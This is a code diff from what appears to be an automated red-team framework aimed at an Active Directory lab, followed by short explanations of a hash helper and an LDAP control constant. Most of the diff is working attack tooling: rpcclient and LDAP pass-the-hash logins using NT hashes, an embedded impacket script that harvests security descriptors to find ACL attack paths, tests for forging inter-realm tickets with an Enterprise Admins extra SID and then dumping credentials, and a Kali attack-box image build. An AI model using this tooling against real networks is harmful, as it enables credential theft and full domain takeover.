#[tokio::test] - async fn create_inter_realm_ticket_executes() { + async fn create_inter_realm_ticket_executes_without_extra_sid() { mock::push(mock::success()); let args = json!({ "trust_key": "aabbccdd", @@ -421,6 +696,65 @@ mod tests { assert!(create_inter_realm_ticket(&args).await.is_ok()); } + #[tokio::test] + async fn create_inter_realm_ticket_executes_with_extra_sid() { + mock::push(mock::success()); + let args = json!({ + "trust_key": "aabbccdd", + "source_sid": "S-1-5-21-111", + "source_domain": "child.contoso.local", + "target_sid": "S-1-5-21-222", + "target_domain": "contoso.local", + "extra_sid": "S-1-5-21-222-519" + }); + assert!(create_inter_realm_ticket(&args).await.is_ok()); + } + + // --- forge_inter_realm_and_dump (arg validation only — full flow needs + // real impacket binaries and a tempdir-aware mock executor) --- + + #[test] + fn forge_inter_realm_and_dump_missing_trust_key() { + let args = json!({ + "source_sid": "S-1-5-21-111", + "source_domain": "child.contoso.local", + "target_domain": "contoso.local", + "target": "dc01.contoso.local" + }); + let rt = tokio::runtime::Runtime::new().unwrap(); + let result = rt.block_on(super::forge_inter_realm_and_dump(&args)); + assert!(result.is_err()); + assert!(result.unwrap_err().to_string().contains("trust_key")); + } + + #[test] + fn forge_inter_realm_and_dump_missing_source_sid() { + let args = json!({ + "trust_key": "aabbccdd", + "source_domain": "child.contoso.local", + "target_domain": "contoso.local", + "target": "dc01.contoso.local" + }); + let rt = tokio::runtime::Runtime::new().unwrap(); + let result = rt.block_on(super::forge_inter_realm_and_dump(&args)); + assert!(result.is_err()); + assert!(result.unwrap_err().to_string().contains("source_sid")); + } + + #[test] + fn forge_inter_realm_and_dump_missing_target() { + let args = json!({ + "trust_key": "aabbccdd", + "source_sid": "S-1-5-21-111", + "source_domain": "child.contoso.local", + "target_domain": "contoso.local" + }); + let rt = 
+        tokio::runtime::Runtime::new().unwrap();
+        let result = rt.block_on(super::forge_inter_realm_and_dump(&args));
+        assert!(result.is_err());
+        assert!(result.unwrap_err().to_string().contains("target"));
+    }
+
     #[tokio::test]
     async fn create_inter_realm_ticket_with_username_executes() {
         mock::push(mock::success());
diff --git a/ares-tools/src/recon.rs b/ares-tools/src/recon.rs
index 1bdf40e9..cfeb326a 100644
--- a/ares-tools/src/recon.rs
+++ b/ares-tools/src/recon.rs
@@ -269,12 +269,19 @@ pub async fn run_bloodhound(args: &Value) -> Result<ToolOutput> {
 /// Run an LDAP search query against a target.
 ///
 /// Required args: `target`, `domain`
-/// Optional args: `username`, `password`, `base_dn`, `filter`, `attributes`
+/// Optional args: `username`, `password`, `bind_domain`, `base_dn`, `filter`, `attributes`
+///
+/// `domain` controls the base DN (the partition being queried).
+/// `bind_domain` (optional) overrides the domain used in the bind DN
+/// (`user@bind_domain`). Use this when authenticating with a credential
+/// from a different domain than the one being searched — e.g. querying
+/// a parent DC with a child-domain credential. Defaults to `domain`.
 pub async fn ldap_search(args: &Value) -> Result<ToolOutput> {
     let target = required_str(args, "target")?;
     let domain = required_str(args, "domain")?;
     let username = optional_str(args, "username");
     let password = optional_str(args, "password");
+    let bind_domain = optional_str(args, "bind_domain");
     let base_dn = optional_str(args, "base_dn");
     let filter = optional_str(args, "filter");
     let attributes = optional_str(args, "attributes");
@@ -292,7 +299,8 @@ pub async fn ldap_search(args: &Value) -> Result<ToolOutput> {
         .timeout_secs(120);
 
     if let (Some(u), Some(p)) = (username, password) {
-        let bind_dn = format!("{u}@{domain}");
+        let auth_domain = bind_domain.unwrap_or(domain);
+        let bind_dn = format!("{u}@{auth_domain}");
         cmd = cmd.flag("-D", bind_dn).flag("-w", p);
     }
@@ -317,16 +325,34 @@ pub async fn ldap_search(args: &Value) -> Result<ToolOutput> {
 /// Execute an rpcclient command against a target.
 ///
 /// Required args: `target`, `command`
-/// Optional args: `username`, `password`, `domain`, `null_session`
+/// Optional args: `username`, `password`, `domain`, `null_session`, `hash`
 pub async fn rpcclient_command(args: &Value) -> Result<ToolOutput> {
     let target = required_str(args, "target")?;
     let command = required_str(args, "command")?;
     let null_session = optional_bool(args, "null_session").unwrap_or(false);
+    let hash = optional_str(args, "hash");
 
     let mut cmd = CommandBuilder::new("rpcclient").timeout_secs(120);
 
     if null_session {
         cmd = cmd.args(["-U", "", "-N"]);
+    } else if let Some(ntlm_hash) = hash {
+        // Pass-the-hash: use --pw-nt-hash and supply the NTLM hash as the password.
+        // rpcclient --pw-nt-hash expects only the NT hash (32 hex chars), not LM:NT.
+        // If the hash is in LM:NT format (e.g. "aad3b435...:2e993405..."), extract
+        // just the NT part (after the colon).
+        let nt_hash = if ntlm_hash.contains(':') {
+            ntlm_hash.rsplit(':').next().unwrap_or(ntlm_hash)
+        } else {
+            ntlm_hash
+        };
+        let domain = optional_str(args, "domain");
+        let username = optional_str(args, "username").unwrap_or("Administrator");
+        let user_spec = match domain {
+            Some(d) => format!("{d}/{username}%{nt_hash}"),
+            None => format!("{username}%{nt_hash}"),
+        };
+        cmd = cmd.flag("-U", user_spec).arg("--pw-nt-hash");
     } else {
         let domain = optional_str(args, "domain");
         let username = optional_str(args, "username").unwrap_or("");
@@ -573,6 +599,113 @@ pub async fn smbclient_kerberos_shares(args: &Value) -> Result<ToolOutput> {
 
     cmd.arg(format!("@{target}")).execute().await
 }
 
+/// Enumerate ACL attack paths via LDAP nTSecurityDescriptor queries.
+///
+/// Queries all user, group, and computer objects requesting nTSecurityDescriptor,
+/// sAMAccountName, objectClass, and objectSid. The binary SD data is parsed
+/// by the ntsd parser to identify dangerous ACEs.
+///
+/// Required args: `target`, `domain`
+/// Optional args: `username`, `password`, `bind_domain`, `hash`
+pub async fn ldap_acl_enumeration(args: &Value) -> Result<ToolOutput> {
+    let target = required_str(args, "target")?;
+    let domain = required_str(args, "domain")?;
+    let username = optional_str(args, "username");
+    let password = optional_str(args, "password");
+    let bind_domain = optional_str(args, "bind_domain");
+    let hash = optional_str(args, "hash");
+
+    let base_dn = domain_to_base_dn(domain);
+    let uri = format!("ldap://{target}");
+
+    // If hash is provided, use impacket LDAP for pass-the-hash
+    if let (Some(u), Some(h)) = (username, hash) {
+        let nt_hash = if h.contains(':') {
+            h.rsplit(':').next().unwrap_or(h)
+        } else {
+            h
+        };
+        let ldap_query = format!(
+            r#"python3 -c "
+import base64
+from impacket.ldap import ldap as ldap_mod
+conn = ldap_mod.LDAPConnection('ldap://{target}', '{base_dn}', '{target}')
+conn.login('{u}', '', '{domain}', lmhash='', nthash='{nt_hash}')
+sc = 
ldap_mod.SimplePagedResultsControl(size=1000) +resp = conn.search( + searchFilter='(|(objectCategory=person)(objectCategory=group)(objectCategory=computer))', + attributes=['sAMAccountName','objectClass','objectSid','nTSecurityDescriptor'], + searchControls=[sc], + sizeLimit=0, +) +for item in resp: + try: + dn = str(item['objectName']) + if not dn: + continue + print(f'dn: {{dn}}') + for attr in item['attributes']: + name = str(attr['type']) + for val in attr['vals']: + if name == 'nTSecurityDescriptor': + b = bytes(val) + print(f'nTSecurityDescriptor:: {{base64.b64encode(b).decode()}}') + elif name == 'objectSid': + b = bytes(val) + print(f'objectSid:: {{base64.b64encode(b).decode()}}') + else: + print(f'{{name}}: {{val}}') + print() + except Exception: + pass +" +"#, + target = target, + domain = domain, + u = u, + nt_hash = nt_hash, + base_dn = base_dn, + ); + return CommandBuilder::new("bash") + .args(["-c", &ldap_query]) + .timeout_secs(300) + .execute() + .await; + } + + // Password-based: use ldapsearch with LDAP_SERVER_SD_FLAGS_OID control + // to request DACL (value 4) in the nTSecurityDescriptor attribute + let mut cmd = CommandBuilder::new("ldapsearch") + .arg("-x") + .flag("-H", &uri) + .timeout_secs(300); + + if let (Some(u), Some(p)) = (username, password) { + let auth_domain = bind_domain.unwrap_or(domain); + let bind_dn = format!("{u}@{auth_domain}"); + cmd = cmd.flag("-D", bind_dn).flag("-w", p); + } + + cmd = cmd + .flag("-b", &base_dn) + // Request DACL only via SD_FLAGS control (0x04 = DACL) + // BER: SEQUENCE { INTEGER 4 } = 30 03 02 01 04 → base64 MAMCAQQ= + .args(["-E", "1.2.840.113556.1.4.801=::MAMCAQQ="]) + .arg("(|(objectCategory=person)(objectCategory=group)(objectCategory=computer))") + .args([ + "sAMAccountName", + "objectClass", + "objectSid", + "nTSecurityDescriptor", + ]); + + cmd.execute().await +} + +// --------------------------------------------------------------------------- +// Tests +// 
--------------------------------------------------------------------------- + #[cfg(test)] mod tests { use super::*; @@ -595,6 +728,8 @@ mod tests { assert_eq!(domain_to_base_dn("local"), "DC=local"); } + // --- mock executor tests: exercise full CommandBuilder code paths --- + use crate::executor::mock; use serde_json::json; diff --git a/test.sh b/test.sh index 2181dfb4..63cac591 100755 --- a/test.sh +++ b/test.sh @@ -5,17 +5,22 @@ EC2_NAME="${EC2_NAME:-kali-ares}" TARGET="${TARGET:-dreadgoad}" BLUE_ENABLED="${BLUE_ENABLED:-1}" -echo "=== Deploying binaries to ${EC2_NAME} ===" -task -y ec2:deploy EC2_NAME="${EC2_NAME}" +echo "=== Stopping workers + any running operation ===" +task ec2:stop EC2_NAME="${EC2_NAME}" 2>/dev/null || true +task ec2:stop-op EC2_NAME="${EC2_NAME}" LATEST=true 2>/dev/null || true echo "" -echo "=== Stopping any running operation ===" -task ec2:stop-op EC2_NAME="${EC2_NAME}" LATEST=true 2>/dev/null || true +echo "=== Deploying binaries to ${EC2_NAME} ===" +task -y ec2:deploy EC2_NAME="${EC2_NAME}" echo "" echo "=== Wiping Redis ===" task ec2:exec EC2_NAME="${EC2_NAME}" CMD="redis-cli FLUSHALL" +echo "" +echo "=== Starting workers on fresh Redis with new binary ===" +task ec2:start EC2_NAME="${EC2_NAME}" + echo "" echo "=== Launching operation against ${TARGET} (blue=${BLUE_ENABLED}) ===" task -y red:ec2:multi TARGET="${TARGET}" EC2_NAME="${EC2_NAME}" BLUE_ENABLED="${BLUE_ENABLED}" diff --git a/warpgate-templates/templates/ares-golden-azure/warpgate.yaml b/warpgate-templates/templates/ares-golden-azure/warpgate.yaml new file mode 100644 index 00000000..fd3ca6ec --- /dev/null +++ b/warpgate-templates/templates/ares-golden-azure/warpgate.yaml @@ -0,0 +1,95 @@ +# yaml-language-server: $schema=https://raw.githubusercontent.com/cowdogmoo/warpgate/main/schema/warpgate-template.json +metadata: + name: ares-golden-azure + version: 1.0.0 + description: Azure variant of the Ares golden image with all red team tools - recon, credential access, privesc, 
cracking, lateral movement, ACL abuse, and coercion + author: Dreadnode + license: MIT + tags: + - ares + - golden-image + - azure + - red-team + - reconnaissance + - credential-access + - privilege-escalation + - password-cracking + - lateral-movement + - acl + - coercion + requires: + warpgate: '>=1.0.0' + +name: ares-golden-azure +version: latest + +base: + image: kali-linux/kali/kali-last:latest + +provisioners: + # Install pipx + Ansible, then fetch the nimbus_range collection on the build VM. + # We re-clone in shell rather than using warpgate's `sources` + `type: file` + # pattern (see ares-golden-image) because Azure Image Builder expands `type: file` + # into one customizer per file and times out on the 2000+ file ansible/ tree. + # Token is passed via a credential helper so it never appears in the clone URL + # or AIB customizer logs; ref tracks the AMI variant. + - type: shell + inline: + - apt-get update + - apt-get install -y --no-install-recommends ca-certificates git procps sudo python3-apt python3-pip python3-venv pipx + - 'sed -i ''s|^PATH="|PATH="/root/.local/bin:/root/.cargo/bin:|'' /etc/environment || echo ''PATH="/root/.local/bin:/root/.cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"'' > /etc/environment' + - pipx install --force uv + - pipx install --force ansible-core + - pipx ensurepath + - GITHUB_TOKEN=${GITHUB_TOKEN} git -c 'credential.helper=!f() { echo username=x-access-token; echo password=$GITHUB_TOKEN; }; f' clone --depth 1 --branch feat/more-attack-cov https://github.com/dreadnode/ares.git /tmp/nimbus_range + - mkdir -p /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range + - cp -r /tmp/nimbus_range/ansible/. 
/root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/ + - rm -rf /tmp/nimbus_range + + # Attack Box - all red team tools + Alloy telemetry + # NOTE: Using shell instead of ansible provisioner because the playbook + # exceeds Azure VM Image Builder's customizer length limit when inlined. + # GPU drivers/CUDA are deferred to first-boot on GPU SKUs (cloud-init or + # systemd unit on the consuming VM) — Azure standard managed disks are + # too slow to do the 3GB+ cuda-toolkit + DKMS rebuild inside the AIB + # buildTimeout. apt hashcat is used instead of compiling from source + # for the same reason (the AWS variant has NVMe local storage, Azure + # D-series does not). + - type: shell + inline: + - PATH=/root/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ansible-galaxy collection install -r /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/requirements.yml --force + - HOME=/root ANSIBLE_REMOTE_TMP=/tmp/ansible-tmp-$USER PATH=/root/.local/bin:/root/.cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ansible-playbook /root/.ansible/collections/ansible_collections/dreadnode/nimbus_range/playbooks/ares/goad_attack_box.yml -i localhost, -c local -e ansible_shell_executable=/bin/bash -e ansible_python_interpreter=/usr/bin/python3 -e cloud_provider=azure -e cracking_tools_gpu_support=false + + # Cleanup + - type: shell + inline: + - apt-get clean + - rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/* + - echo "Ares golden azure build completed successfully" + +targets: + - type: azure + subscription_id: 70a9c8a4-6bc6-4a48-ae24-27996cea8c02 + location: centralus + resource_group: WARPGATE-TEST-RG + gallery: warpgateTestGallery + gallery_image_definition: ares-golden-azure + identity_id: /subscriptions/70a9c8a4-6bc6-4a48-ae24-27996cea8c02/resourcegroups/warpgate-test-rg/providers/Microsoft.ManagedIdentity/userAssignedIdentities/warpgate-aib-uami + # D8s_v3 (8 vCPU) timed out at 360min on the full 
red-team toolchain; + # bumping to D16s_v3 for 2x parallelism. D8s_v5 capacity-restricted. + vm_size: Standard_D16s_v3 + source_image: + marketplace: + publisher: kali-linux + offer: kali + sku: kali-2026-1 + version: latest + plan: + name: kali-2026-1 + product: kali + publisher: kali-linux + image_tags: + Project: ares + Role: RedTeamAttackBox + ManagedBy: warpgate + Tools: recon,credential-access,privesc,cracker,lateral-movement,acl-abuse,coercion
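The `credentials::nt_hash_only` helper is called in `create_inter_realm_ticket` and `forge_inter_realm_and_dump` but its body is not part of this diff. Assuming it mirrors the inline `LM:NT` handling visible in `rpcclient_command` and `ldap_acl_enumeration`, a minimal standalone sketch might look like this (the function name comes from the diff; the exact implementation is an assumption):

```rust
/// Hypothetical sketch of the `nt_hash_only` helper referenced in the diff:
/// reduce a secretsdump-style `LM:NT` pair to the bare NT half, mirroring the
/// inline `rsplit(':')` logic used in `rpcclient_command`.
fn nt_hash_only(hash: &str) -> &str {
    // `rsplit(':')` yields the substring after the last colon first; for a
    // colon-free input it yields the whole string, so an already-bare NT hash
    // passes through unchanged.
    hash.rsplit(':').next().unwrap_or(hash)
}

fn main() {
    // LM:NT pair harvested from secretsdump output -> NT half only.
    assert_eq!(
        nt_hash_only("aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"),
        "31d6cfe0d16ae931b73c59d7e0c089c0"
    );
    // Bare NT hash is a no-op.
    assert_eq!(
        nt_hash_only("31d6cfe0d16ae931b73c59d7e0c089c0"),
        "31d6cfe0d16ae931b73c59d7e0c089c0"
    );
}
```

This is why `impacket-ticketer`'s `'Odd-length string'` error disappears: the 65-char `LM:NT` form is stripped to the 32-char NT hash before it reaches `-nthash`.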
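The `MAMCAQQ=` constant in `ldap_acl_enumeration`'s `-E 1.2.840.113556.1.4.801=::MAMCAQQ=` control can be re-derived rather than taken on faith: BER-encode `SEQUENCE { INTEGER 4 }` (flag 0x04 = DACL) and base64 the five bytes. A self-contained verification sketch with a hand-rolled std-only encoder (not project code, just a check of the comment's arithmetic):

```rust
const B64: &[u8; 64] = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/// Minimal RFC 4648 base64 encoder, sufficient for verifying short constants.
fn base64(data: &[u8]) -> String {
    let mut out = String::new();
    for chunk in data.chunks(3) {
        // Pack up to three bytes into a 24-bit group, zero-padded on the right.
        let b = [chunk[0], *chunk.get(1).unwrap_or(&0), *chunk.get(2).unwrap_or(&0)];
        let n = u32::from(b[0]) << 16 | u32::from(b[1]) << 8 | u32::from(b[2]);
        for i in 0..4 {
            if i <= chunk.len() {
                out.push(B64[(n >> (18 - 6 * i)) as usize & 63] as char);
            } else {
                out.push('='); // pad positions beyond the input bytes
            }
        }
    }
    out
}

fn main() {
    // SD_FLAGS control value requesting the DACL only:
    // BER SEQUENCE (0x30), length 3, INTEGER (0x02), length 1, value 4.
    let sd_flags_dacl = [0x30, 0x03, 0x02, 0x01, 0x04];
    assert_eq!(base64(&sd_flags_dacl), "MAMCAQQ=");
}
```

The same routine confirms the inline comment in the diff, `30 03 02 01 04 → MAMCAQQ=`, so the hard-coded control value and its BER derivation agree.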